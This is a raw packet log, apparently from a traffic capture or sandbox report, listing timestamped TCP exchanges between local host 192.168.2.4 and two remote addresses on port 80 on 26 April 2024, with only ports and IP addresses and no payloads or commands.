Apr 26, 2024 23:09:03.316014051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.316082001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.316119909 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.316159010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.316196918 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.316387892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.316428900 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.316829920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.316870928 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.316947937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.316987991 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.317037106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.317075968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.317137003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.317178965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.317229986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.317241907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.317267895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.317276955 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.317339897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.317378044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.317424059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.317460060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.317467928 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.317501068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.317543030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.317581892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.317658901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.317697048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.317724943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.317765951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.317990065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318031073 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318052053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318104029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318260908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318300009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318311930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318348885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318361998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318399906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318531990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318542957 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318572044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318583012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318589926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318625927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318708897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318747044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318768024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318808079 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318880081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318921089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318936110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.318981886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.318985939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.319025993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.319272995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.319313049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.319530964 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.319566965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.319701910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.319741964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.319752932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.319789886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.319978952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.320018053 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.320095062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.320136070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.320172071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.320209980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.320259094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.320298910 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.320348024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.320389032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.320447922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.320486069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.320905924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.320945978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321011066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321050882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321072102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321111917 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321166992 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321203947 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321261883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321310997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321331978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321372032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321423054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321461916 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321474075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321511030 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321522951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321563005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321633101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321675062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321695089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321738005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321748972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321788073 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321861982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321902037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.321913958 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.321952105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.322026014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.322066069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.322113991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.322180986 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.322196960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.322235107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.322248936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.322283030 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.322359085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.322371006 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.322398901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.322407961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.322417021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.322472095 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.330313921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.330355883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.330355883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.371706009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.374375105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.374388933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.374402046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.374438047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.374469042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.374481916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.374512911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.374546051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.374587059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.374712944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.374726057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.374742031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.374754906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.374764919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.374799967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.374823093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.375112057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375145912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.375157118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375217915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375252962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.375263929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375411987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375425100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375437975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375448942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.375453949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375468969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375478029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.375494957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375504971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.375519991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375559092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.375588894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375611067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375653028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.375674009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375699043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375719070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375757933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.375790119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375802994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.375828981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.376245022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376283884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.376375914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376440048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376477003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.376560926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376574993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376607895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376615047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.376622915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376666069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.376697063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376709938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376722097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376734972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376744032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.376749039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376769066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.376796961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376822948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376852989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.376889944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376904011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376921892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.376936913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.376971960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.377094030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377106905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377144098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.377213955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377249002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377284050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.377294064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377306938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377319098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377332926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377338886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.377367973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.377458096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377471924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377484083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377497911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.377504110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.377553940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.378102064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.378117085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.378154039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.379430056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.379442930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.379477024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.379757881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.379791975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.379829884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.379844904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.379878044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.379889965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.379909039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.379934072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.379970074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.379983902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380002975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380013943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380026102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380036116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380048990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380070925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380079031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380112886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380122900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380157948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380179882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380189896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380230904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380243063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380261898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380296946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380310059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380321980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380331039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380337000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380353928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380419016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380431890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380444050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380451918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380458117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380477905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380481958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380507946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380521059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380882978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380896091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380923986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380942106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.380976915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.380990028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381002903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381014109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381037951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.381153107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381195068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.381221056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381234884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381246090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381258965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381266117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.381290913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.381294012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381324053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381336927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381347895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381356955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.381386995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381386995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.381470919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381484032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381503105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.381897926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381927967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381934881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.381942034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.381973982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.382188082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382201910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382232904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.382299900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382313013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382324934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382338047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382358074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.382374048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.382462978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382474899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382488012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382508039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.382533073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382567883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.382595062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382672071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382683992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382694960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382705927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.382709026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382724047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382729053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.382736921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382756948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.382785082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382797956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382818937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.382838964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.382875919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.383467913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383485079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383517027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383523941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.383532047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383567095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.383678913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383730888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383759975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383764982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.383822918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383846998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383858919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.383858919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383887053 CEST	80	49734	176.97.76.106	192.168.2.4
